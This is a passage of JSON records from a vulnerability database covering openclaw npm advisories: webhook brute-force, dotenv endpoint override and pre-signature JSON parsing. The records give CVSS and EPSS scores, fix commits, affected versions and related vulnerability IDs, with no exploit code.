            "summary": "OpenClaw: BlueBubbles Webhook Missing Rate Limiting Enables Brute-Force Password Guessing\n## Summary\n\nBlueBubbles Webhook Missing Guess Rate Limiting Enables Brute-Force Guessing of Weak Webhook Password\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nBlueBubbles webhook auth previously rejected wrong passwords without throttling repeated guesses, allowing brute-force attempts against weak webhook passwords. Commit `5e08ce36d522a1c96df2bfe88e39303ae2643d92` adds repeated-guess throttling before auth failure responses.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `5e08ce36d522a1c96df2bfe88e39303ae2643d92`.\n\n## Fix Commit(s)\n\n- `5e08ce36d522a1c96df2bfe88e39303ae2643d92`",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35623",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00108",
                            "scoring_system": "epss",
                            "scoring_elements": "0.28542",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00108",
                            "scoring_system": "epss",
                            "scoring_elements": "0.28579",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00108",
                            "scoring_system": "epss",
                            "scoring_elements": "0.2862",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35623"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/5e08ce36d522a1c96df2bfe88e39303ae2643d92",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T15:52:54Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/5e08ce36d522a1c96df2bfe88e39303ae2643d92"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-xq8g-hgh6-87hv",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T15:52:54Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-xq8g-hgh6-87hv"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35623",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35623"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-brute-force-attack-via-missing-webhook-password-rate-limiting",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T15:52:54Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-brute-force-attack-via-missing-webhook-password-rate-limiting"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-xq8g-hgh6-87hv",
                    "reference_id": "GHSA-xq8g-hgh6-87hv",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-xq8g-hgh6-87hv"
                }
            ],
            "fixed_packages": [],
            "aliases": [
                "CVE-2026-35623",
                "GHSA-xq8g-hgh6-87hv"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4nwq-14y4-xkhp"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/92152?format=api",
            "vulnerability_id": "VCID-4u3z-rs45-gbhe",
            "summary": "OpenClaw: Workspace dotenv files cannot override connector endpoint hosts\n## Summary\nIn affected versions, workspace dotenv files could override connector endpoint hosts; fixed versions block these overrides when a workspace .env file is loaded.\n\n## Affected Packages / Versions\n- Package: openclaw (npm)\n- Affected versions: <= 2026.4.21\n- Fixed version: 2026.4.22\n\n## Impact\nA workspace .env file could set connector endpoint variables for Matrix, Mattermost, IRC, or Synology-related connectors and redirect runtime traffic away from the operator-configured endpoint.\n\n## Fix\nWorkspace .env loading now blocks those endpoint variables, including per-account Matrix homeserver suffixes and generic base-url/API-host style overrides. Trusted global runtime dotenv loading remains separate.\n\n## Fix Commit(s)\n- 0623079e98abf7202591f1b04a89755eb7ec9272\n\n## Verification\n- The fix commit is contained in the public v2026.4.22 tag.\n- openclaw@2026.4.22 is published on npm and the compiled package contains the fix.\n- Focused regression coverage for this path passed before publication.\n\nOpenClaw thanks @qi-scape for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45003",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00011",
                            "scoring_system": "epss",
                            "scoring_elements": "0.01337",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00011",
                            "scoring_system": "epss",
                            "scoring_elements": "0.01342",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00011",
                            "scoring_system": "epss",
                            "scoring_elements": "0.01341",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45003"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/0623079e98abf7202591f1b04a89755eb7ec9272",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "4.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:25:02Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/0623079e98abf7202591f1b04a89755eb7ec9272"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-55cf-xx38-4p9p",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "4.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:25:02Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-55cf-xx38-4p9p"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45003",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45003"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-connector-endpoint-host-override-via-workspace-dotenv-files",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "4.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:25:02Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-connector-endpoint-host-override-via-workspace-dotenv-files"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-55cf-xx38-4p9p",
                    "reference_id": "GHSA-55cf-xx38-4p9p",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-55cf-xx38-4p9p"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/114466?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.22",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.22"
                }
            ],
            "aliases": [
                "CVE-2026-45003",
                "GHSA-55cf-xx38-4p9p"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4u3z-rs45-gbhe"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91107?format=api",
            "vulnerability_id": "VCID-4uqc-3h1c-4yhs",
            "summary": "OpenClaw: Feishu webhook reads and parses unauthenticated request bodies before signature validation\n## Summary\n\nFeishu webhook reads and parses unauthenticated request bodies before signature validation\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nFeishu webhook handling previously parsed JSON before signature validation, which let unauthenticated callers force full JSON parsing work before rejection. Commit `5e8cb22176e9235e224be0bc530699261eb60e53` reads the raw request body, validates the signature first, and only then parses JSON.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `5e8cb22176e9235e224be0bc530699261eb60e53`.\n\n## Fix Commit(s)\n\n- `5e8cb22176e9235e224be0bc530699261eb60e53`",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35640",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00127",
                            "scoring_system": "epss",
                            "scoring_elements": "0.31558",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00127",
                            "scoring_system": "epss",
                            "scoring_elements": "0.31486",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00127",
                            "scoring_system": "epss",
                            "scoring_elements": "0.31523",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35640"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/5e8cb22176e9235e224be0bc530699261eb60e53",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:25:51Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/5e8cb22176e9235e224be0bc530699261eb60e53"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3h52-cx59-c456",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:25:51Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3h52-cx59-c456"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35640",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35640"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-unauthenticated-webhook-request-parsing",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:25:51Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-unauthenticated-webhook-request-parsing"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-3h52-cx59-c456",
                    "reference_id": "GHSA-3h52-cx59-c456",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-3h52-cx59-c456"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
